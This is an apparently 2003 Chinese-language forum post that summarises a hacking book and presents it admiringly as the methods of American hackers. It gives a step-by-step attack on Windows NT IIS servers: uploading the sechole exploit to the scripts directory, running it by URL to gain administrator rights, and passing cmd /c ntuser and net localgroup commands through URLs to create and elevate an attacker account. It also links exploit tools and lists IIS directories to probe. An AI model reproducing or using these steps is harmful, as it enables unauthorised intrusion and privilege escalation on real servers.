|
論壇說明 | 標記討論區已讀 |
歡迎您來到『史萊姆論壇』 ^___^ 您目前正以訪客的身份瀏覽本論壇,訪客所擁有的權限將受到限制,您可以瀏覽本論壇大部份的版區與文章,但您將無法參與任何討論或是使用私人訊息與其他會員交流。若您希望擁有完整的使用權限,請註冊成為我們的一份子,註冊的程序十分簡單、快速,而且最重要的是--註冊是完全免費的! 請點擊這裡:『註冊成為我們的一份子!』 |
|
主題工具 | 顯示模式 |
2003-11-23, 04:01 AM | #1 |
|
美國超級駭客 還在用木馬等魚兒上勾,然後用prot掃瞄,或偷窺icp漏洞,或是猜密碼,或放或寄病毒網頁等人打開來
還在用木馬等魚兒上勾,然後用prot掃瞄,或偷窺icp漏洞,或是猜密碼,或放或寄病毒網頁
等人打開來這些初等或中等的攻擊法嗎??美國駭客的實力真是另人無法想像, 他們只需利用網址就能輕而意舉的主動攻擊了,情結不輸給電影,我們的手法 對他們而言只是無須大驚小怪的小兒科......參考書為黑紅色的網路駭客與系統安全 (好像有新版的,小皇是舊版的,名稱與外關差不多) 書籍上的重點,作者是美國著名的網路安全專家, 遠端緩衝區溢滿{buffer overflow} 緩衝區溢滿是發生在程式沒有適當的檢查輸入內容的長度 ,而導致緩衝區空間不足,因此,任何預期之外的輸入,就會 掩蓋掉CPU執行堆疊的其它部分. 遠端執行命令取得系統管理者權限 http://www.infowar.co.uk/mnemonix 遠端執行一個批次檔執行任意的程式 http://www.infowar.co.uk/mnemonix/Ntbufferoverruns.htm ISSHACK http://www.eeye.com 在NT ISS網頁伺服器上執行程式碼 在本機中可以給使一位使用者加入到區域的管理者群組中的擴權程式 http://www.ntsecurity.net/security/getadmin.htm 有相似功能的其它程式 sechole升級版是secholed http://www.ntsecurity.net/security/sechole.htm (Domain Admin group) 網域管理者(升級)群組 cmd.exe NT命令解釋器 ntuser 程式 用來修改使用者,群組和政策的程式,可參考 http://www.pedestalsoftware.com Sechole的啟動可靠在一個瀏覽器輸入一個適當的URL連網目標系統,例如下列 我們將Sechole上傳至/W3SVC/1/ROOT/SCRIPTS (這裡就是C:\inetpub\SCRIPTS) 然後用下面的URL網址啟動它 http://192.168.202.154/scripts/secholle.exe 這樣做會成功的將IUSR_machine_name帳號加入管理者群組中,我們並沒有 IUSR的密碼,因此我們為了要避免登入IUSR,通常是在目標系統上開個帳號, 做法是利用ntuser公用程式透過瀏覽器執行下列複雜的URL(為了方便閱讀內容經過裝飾) http://192.168.202.154/scripts/cmd.e...sword%20secret 以上%20再網語中是空白的意思,所以以上網址會被執行為 (cmd /c 會送出ntuser命令到shell,在完成時終結自己) cmd /c ntuser -s <servername> add <username> -password <password> 以上我們是以corpl做伺服機名稱,mallory是使用者名稱,secret當密碼, 用類似的URL攻擊者可以用ntuser幫你把mallory加到管理者群組裡,如下 (LORGUP是指某個區域群組) cmd /c ntuser -s <servername> LORGUP APPEND <groupname> <username>... http://192.168.202.154/scripts/cmd.e...tors%20mallory 同機能的批次檔寫法如registry,cmd 內容: net localgroup administrators <USER> /add 安全系統ISS目錄和一些潛在可行的目錄 http://www.iss.net/xforce/alerts/advise6.html 以下/W3SVC/1/ROOT通常是指C:\Inetpub\還有News及Mail /W3SVC/1/ROOT/msade /W3SVC/1/ROOT/cgi-bin /W3SVC/1/ROOT/SCRIPTS /W3SVC/1/ROOT/ISSADMPWD /W3SVC/1/ROOT/_vti_bin /W3SVC/1/ROOT/_vti_bin/_vti_adm /W3SVC/1/ROOT/_vti_bin/_vti_aut (_vti_bin都是安裝Front Page之後衍生出來的) |
送花文章: 0,
|
向 送花的會員:
|
llliu60 (2013-02-01)
感謝您發表一篇好文章 |